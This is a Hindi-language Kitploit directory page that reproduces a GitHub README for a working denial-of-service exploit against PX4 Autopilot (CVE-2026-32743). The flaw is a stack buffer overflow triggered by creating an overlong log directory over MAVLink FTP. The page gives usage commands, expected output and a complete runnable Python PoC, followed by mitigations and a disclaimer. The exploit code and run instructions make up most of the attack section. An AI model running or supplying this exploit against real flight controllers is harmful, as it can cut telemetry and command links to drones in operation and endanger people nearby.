Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS- — PX4 ऑटोपायलट संस्करण ≤1.17.0-rc2 के लिए एक रिमोट डिनायल ऑफ सर्विस (DoS) शोषण, जो MavlinkLogHandler में स्टैक-आधारित बफर ओवरफ्लो के माध्यम से काम करता है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-32743-px4-autopilot-mavlinkloghandler-stack-buffer-overflow-dos-
एम्बेडेड सिस्टम सुरक्षाशोषण फ्रेमवर्कIoT सुरक्षाभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubmbanyamer/cve-2026-32743-px4-autopilot-mavlinkloghandler-stack-buffer-overflow-dos-

CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS-

PX4 ऑटोपायलट संस्करण ≤1.17.0-rc2 के लिए एक रिमोट डिनायल ऑफ सर्विस (DoS) शोषण, जो MavlinkLogHandler में स्टैक-आधारित बफर ओवरफ्लो के माध्यम से काम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-32743 - PX4 ऑटोपायलट MavlinkLogHandler स्टैक बफर ओवरफ्लो (DoS)

CVE-2026-32743 CVSS CWE PX4 Exploit License Python

GitHub Instagram Twitter


📜 विवरण

CVE-2026-32743 PX4 ऑटोपायलट संस्करण ≤1.17.0-rc2 के MavlinkLogHandler में एक स्टैक-आधारित बफर ओवरफ्लो है।
LogEntry.filepath बफर केवल 60 बाइट्स का है, लेकिन sscanf() लॉग डायरेक्टरी पथों को बिना चौड़ाई स्पेसिफायर के पार्स करता है।

MAVLink लिंक एक्सेस वाला हमलावर यह कर सकता है:

  1. MAVLink FTP का उपयोग करके /fs/microsd/log/ के अंदर एक गहरी नेस्टेड डायरेक्टरी (पथ की लंबाई > 60 बाइट्स) बना सकता है।
  2. MAV_CMD_REQUEST_LOG_LIST के माध्यम से लॉग सूची का अनुरोध कर सकता है।
  3. कमजोर MavlinkLogHandler लंबे पथ को 60-बाइट बफर में कॉपी करता है → स्टैक ओवरफ्लो।
  4. MAVLink टास्क क्रैश हो जाता है → टेलीमेट्री और कमांड क्षमता का नुकसान → लगातार डिनायल ऑफ सर्विस (रीबूट तक)।

फिक्स किया गया: कमिट 616b25a (sscanf में चौड़ाई स्पेसिफायर जोड़ा गया)।


🔥 हमले का फ्लो डायग्राम

root@kitploit:~
sequenceDiagram
    participant Attacker
    participant PX4 as PX4 Flight Controller
    participant SD as SD Card (/fs/microsd/log/)

    Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
    PX4-->>Attacker: Heartbeat (system/component IDs)
    
    Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
    Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
    PX4->>SD: Create directory (named 70×'A')
    SD-->>PX4: OK
    
    Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
    Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
    PX4->>PX4: MavlinkLogHandler::list() reads log directory
    PX4->>PX4: sscanf(path, "%s", LogEntry.filepath)  ← NO width limit!
    Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
    PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands
    Note over Attacker,PX4: ✅ DoS achieved – flight controller unmanageable

⚙️ पूर्वापेक्षाएँ

  • PX4 चलाने वाला टार्गेट ≤ 1.17.0-rc2 जिसमें SD कार्ड माउंटेड हो (लॉग /fs/microsd/log/ में संग्रहीत)।
  • MAVLink FTP सक्षम (अधिकांश PX4 बिल्ड में डिफ़ॉल्ट रूप से)।
  • फ्लाइट कंट्रोलर के MAVLink UDP पोर्ट (डिफ़ॉल्ट 14550) तक नेटवर्क एक्सेस।
  • pymavlink इंस्टॉल के साथ Python 3.6+:
    root@kitploit:~
    pip install pymavlink
    

🚀 उपयोग

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py <TARGET_IP> [--port <PORT>]
तर्कविवरणडिफ़ॉल्ट
target_ipफ्लाइट कंट्रोलर का IP पताआवश्यक
--portMAVLink UDP पोर्ट14550

उदाहरण

root@kitploit:~
python3 exploit.py 192.168.1.10 --port 14550

अपेक्षित आउटपुट (सफल DoS):

root@kitploit:~
[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!

📄 PoC कोड

root@kitploit:~
#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
#   Affected: Versions 1.17.0-rc2 and below
# Tested on: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed in: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py <target_ip> [--port <port>]

print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                            ║
║   ██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗                     ║
║   ██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗                    ║
║   ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝                    ║
║   ██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗                    ║
║   ██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║                    ║
║   ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝                    ║
║                                                                                            ║
║                         [ b a n y a m e r _ s e c u r i t y ]                              ║
║                                                                                            ║
║                  ▸ Silent Hunter  |  Shadow Presence  |  Digital Intel ◂                  ║
║                                                                                            ║
║   Operator : Mohammed Idrees Banyamer  •  Jordan 🇯🇴                                       ║
║   Handle   : @banyamer_security                                                           ║
║                                                                                            ║
║   Exploit  : CVE-2026-32743                                                               ║
║   Target   : PX4 Autopilot • MAVLink • Log Handler                                         ║
║                                                                                            ║
║   Status   : ACTIVE                                                                       ║
║                                                                                            ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")

import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2

def send_ftp_command(mav, seq, payload):
    msg = mav.file_transfer_protocol_encode(
        target_system=mav.target_system,
        target_component=mav.target_component,
        payload=payload
    )
    mav.mav.send(msg)

def ftp_create_directory(mav, path):
    O_CREAT = 0x04
    O_DIRECTORY = 0x08
    seq = 1
    path_bytes = path.encode('utf-8') + b'\x00'
    payload = struct.pack('<BBHB', 0, 0, seq, 0) + path_bytes
    send_ftp_command(mav, seq, payload)
    time.sleep(0.5)

def exploit(target_ip, target_port):
    print(f"[*] Connecting to MAVLink target: {target_ip}:{target_port}")
    master = mavutil.mavlink_connection(f"udpout:{target_ip}:{target_port}")
    master.wait_heartbeat()
    print(f"[+] Heartbeat received from system {master.target_system}, component {master.target_component}")

    long_dir_name = "A" * 70
    full_path = f"/fs/microsd/log/{long_dir_name}"
    print(f"[*] Creating long directory: {full_path} (length {len(full_path)} bytes)")

    try:
        ftp_create_directory(master, full_path)
        print("[+] Directory created (or already existed).")
    except Exception as e:
        print(f"[-] FTP directory creation failed: {e}")
        print("    Ensure the target supports MAVLink FTP and the SD card is mounted.")
        return

    print("[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...")
    master.mav.command_long_send(
        master.target_system,
        master.target_component,
        mavlink2.MAV_CMD_REQUEST_LOG_LIST,
        0,
        0,
        0, 0, 0, 0, 0, 0
    )

    print("[*] Waiting for crash (target will stop responding)...")
    time.sleep(5)

    try:
        master.mav.heartbeat_send(mavlink2.MAV_TYPE_GCS, mavlink2.MAV_AUTOPILOT_GENERIC)
        print("[-] Target still responsive – vulnerability may be patched or conditions not met.")
    except Exception:
        print("[+] Target unresponsive – DoS achieved!")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-32743 PX4 MavlinkLogHandler DoS Exploit")
    parser.add_argument("target_ip", help="IP address of the target flight controller")
    parser.add_argument("--port", type=int, default=14550, help="MAVLink UDP port (default: 14550)")
    args = parser.parse_args()
    exploit(args.target_ip, args.port)

📸 प्रदर्शन

root@kitploit:~
$ python3 exploit.py 192.168.1.100
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║                                          [banner]                                          ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
[*] Connecting to MAVLink target: 192.168.1.100:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!

🛡️ शमन

  • PX4 को अपग्रेड करें पैच वाले संस्करण में (≥1.17.0-rc3 या कमिट 616b25a के बाद का कोई भी बिल्ड)।
  • MAVLink FTP अक्षम करें यदि आवश्यक न हो: पैरामीटर में MAV_0_FTP को 0 पर सेट करें।
  • MAVLink पोर्ट तक नेटवर्क एक्सेस प्रतिबंधित करें (फ़ायरवॉल, VPN, या फिजिकल लिंक)।
  • /fs/microsd/log/ के अंदर असामान्य डायरेक्टरी निर्माण प्रयासों के लिए लॉग की निगरानी करें।

📚 संदर्भ

  • MITRE CVE‑2026‑32743
  • PX4 Security Advisory GHSA‑97c4‑68r9‑96p5
  • Patch Commit
  • MAVLink Protocol
  • pymavlink Documentation

👤 लेखक

मोहम्मद इदरीस बन्यामेर

  • 🇯🇴 जॉर्डन
  • सुरक्षा शोधकर्ता | एक्सप्लॉइट डेवलपर | रेड टीम ऑपरेटर

GitHub Instagram Twitter LinkedIn

"Silent Hunter | Shadow Presence | Digital Intel"


⚠️ अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।
लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेता है।


📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।
एट्रिब्यूशन के साथ उपयोग, संशोधन और वितरण करने के लिए स्वतंत्र महसूस करें।


⭐ अगर यह उपयोगी लगा तो इस रेपो को स्टार करें!

GitHub stars

टूल डाउनलोड करें